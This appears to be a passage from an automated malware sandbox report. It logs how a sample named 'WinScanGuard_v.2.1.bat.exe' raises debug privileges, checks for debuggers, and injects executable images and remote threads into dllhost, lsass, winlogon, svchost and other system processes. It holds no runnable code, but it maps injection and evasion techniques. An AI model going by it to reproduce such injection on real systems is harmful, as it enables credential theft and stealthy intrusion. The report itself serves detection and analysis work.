              Source: C:\Windows\System32\dllhost.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\dllhost.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\dllhost.exeProcess token adjusted: Debug
              Source: C:\Windows\$sxr-powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\dllhost.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\dllhost.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\dllhost.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\dllhost.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeMemory allocated: page read and write | page guardJump to behavior
              Source: C:\Windows\$sxr-mshta.exeCode function: 13_2_000001A00BDB7F10 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_000001A00BDB7F10
              Source: C:\Windows\$sxr-mshta.exeCode function: 13_2_000001A00BDBB5AC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_000001A00BDBB5AC
              Source: C:\Windows\$sxr-mshta.exeCode function: 13_2_00007FF7142F1ADC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00007FF7142F1ADC
              Source: C:\Windows\$sxr-mshta.exeCode function: 13_2_00007FF7142F1800 SetUnhandledExceptionFilter,13_2_00007FF7142F1800
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_0000020D0B627F10 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_0000020D0B627F10
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_0000020D0B62B5AC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_0000020D0B62B5AC
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF615508FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00007FF615508FA4
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF6155093B0 SetUnhandledExceptionFilter,16_2_00007FF6155093B0
              Source: C:\Windows\$sxr-powershell.exeCode function: 21_2_00000242878BB5AC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_00000242878BB5AC
              Source: C:\Windows\$sxr-powershell.exeCode function: 21_2_00000242878B7F10 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_00000242878B7F10
              Source: C:\Windows\System32\winlogon.exeCode function: 24_2_00000225DC64B5AC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_00000225DC64B5AC
              Source: C:\Windows\System32\winlogon.exeCode function: 24_2_00000225DC647F10 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_00000225DC647F10
              Source: C:\Windows\System32\lsass.exeCode function: 25_2_00000202C0AE7F10 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_00000202C0AE7F10
              Source: C:\Windows\System32\lsass.exeCode function: 25_2_00000202C0AEB5AC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_00000202C0AEB5AC
              Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeCode function: 26_2_04029428 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_04029428
              Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeCode function: 26_2_04026964 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_04026964
              Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeCode function: 26_2_0402667A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_0402667A
              Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002A661307F10 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_000002A661307F10
              Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002A66130B5AC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_000002A66130B5AC
              Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002A661367F10 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_000002A661367F10
              Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002A66136B5AC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_000002A66136B5AC
              Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAB14B7F10 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_000002BAB14B7F10
              Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAB14BB5AC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_000002BAB14BB5AC
              Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000026A87F47F10 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_0000026A87F47F10
              Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000026A87F4B5AC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_0000026A87F4B5AC
              Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000179537AB5AC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,36_2_00000179537AB5AC
              Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000179537A7F10 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,36_2_00000179537A7F10
              Source: C:\Windows\System32\svchost.exeCode function: 36_2_0000017953D4B5AC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,36_2_0000017953D4B5AC
              Source: C:\Windows\System32\svchost.exeCode function: 36_2_0000017953D47F10 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,36_2_0000017953D47F10

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAF1A0000 value starts with: 4D5A
              Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 4000000 value starts with: 4D5A
              Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe base: 20E0000 value starts with: 4D5A
              Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe base: 23C0000 value starts with: 4D5A
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC670000 value starts with: 4D5A
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0B10000 value starts with: 4D5A
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A661330000 value starts with: 4D5A
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAF1D0000 value starts with: 4D5A
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC6F0000 value starts with: 4D5A
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0B70000 value starts with: 4D5A
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A661390000 value starts with: 4D5A
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAF200000 value starts with: 4D5A
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26A879C0000 value starts with: 4D5A
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
              Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 2F90000 value starts with: 4D5A
              Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe base: 2230000 value starts with: 4D5A
              Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe base: 23E0000 value starts with: 4D5A
              Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe base: 1450000 value starts with: 4D5A
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC7B0000 value starts with: 4D5A
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0C30000 value starts with: 4D5A
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A661450000 value starts with: 4D5A
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAB14E0000 value starts with: 4D5A
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87F70000 value starts with: 4D5A
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 179537D0000 value starts with: 4D5A
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D590000 value starts with: 4D5A
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25306E60000 value starts with: 4D5A
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B390000 value starts with: 4D5A
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5A
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5A
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5A
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5A
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5A
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5A
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC750000 value starts with: 4D5A
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0BD0000 value starts with: 4D5A
              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6613F0000 value starts with: 4D5A
              Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3200000 value starts with: 4D5A
              Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe base: 2250000 value starts with: 4D5A
              Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe base: 2400000 value starts with: 4D5A
              Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe base: 1470000 value starts with: 4D5A
              Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\winlogon.exe EIP: DC6129A0
              Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\lsass.exe EIP: C0AB29A0
              Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 612D29A0
              Source: C:\Windows\SysWOW64\dllhost.exeThread created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe EIP: 4002102
              Source: C:\Windows\SysWOW64\dllhost.exeThread created: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe EIP: 20E2102
              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DC6729A0
              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C0B129A0
              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 613329A0
              Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\dwm.exe EIP: AF1D29A0
              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DC6F29A0
              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C0B729A0
              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 613929A0
              Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\dwm.exe EIP: AF2029A0
              Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 879C29A0
              Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 537729A0
              Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 5D5329A0
              Source: C:\Windows\SysWOW64\dllhost.exeThread created: unknown EIP: 2F92102
              Source: C:\Windows\SysWOW64\dllhost.exeThread created: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe EIP: 2232102
              Source: C:\Windows\SysWOW64\dllhost.exeThread created: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe EIP: 23E2102
              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DC7B29A0
              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C0C329A0
              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 614529A0
              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B14E29A0
              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 87F729A0
              Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 537D29A0
              Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 5D5929A0
              Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 6E629A0
              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5B3929A0
              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EBFD29A0
              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 590429A0
              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A9E729A0
              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 731629A0
              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4E8629A0
              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 473C29A0
              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6F9D29A0
              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 83BC29A0
              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D3F729A0
              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A41529A0
              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BDF329A0
              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C02629A0
              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DC7529A0
              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C0BD29A0
              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 613F29A0
              Source: C:\Windows\SysWOW64\dllhost.exeThread created: unknown EIP: 3202102
              Source: C:\Windows\SysWOW64\dllhost.exeThread created: unknown EIP: 2252102
              Source: C:\Windows\SysWOW64\dllhost.exeThread created: unknown EIP: 2402102
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000Jump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000Jump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeMemory written: C:\Windows\System32\dllhost.exe base: 140002000Jump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeMemory written: C:\Windows\System32\dllhost.exe base: 140003000Jump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeMemory written: C:\Windows\System32\dllhost.exe base: E738D0C010Jump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 400000Jump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 401000Jump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 402000Jump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 403000Jump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 405000Jump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 25D008Jump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000Jump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000Jump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeMemory written: C:\Windows\System32\dllhost.exe base: 140002000Jump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeMemory written: C:\Windows\System32\dllhost.exe base: 140003000Jump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeMemory written: C:\Windows\System32\dllhost.exe base: F3FC80B010Jump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 400000Jump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 401000Jump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 402000Jump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 403000Jump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 405000Jump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 6E6008Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140002000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140003000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 5BD5B55010Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 400000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 401000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 402000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 403000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 405000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 646008Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140003000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140005000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 729C122010Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 400000Jump to behavior
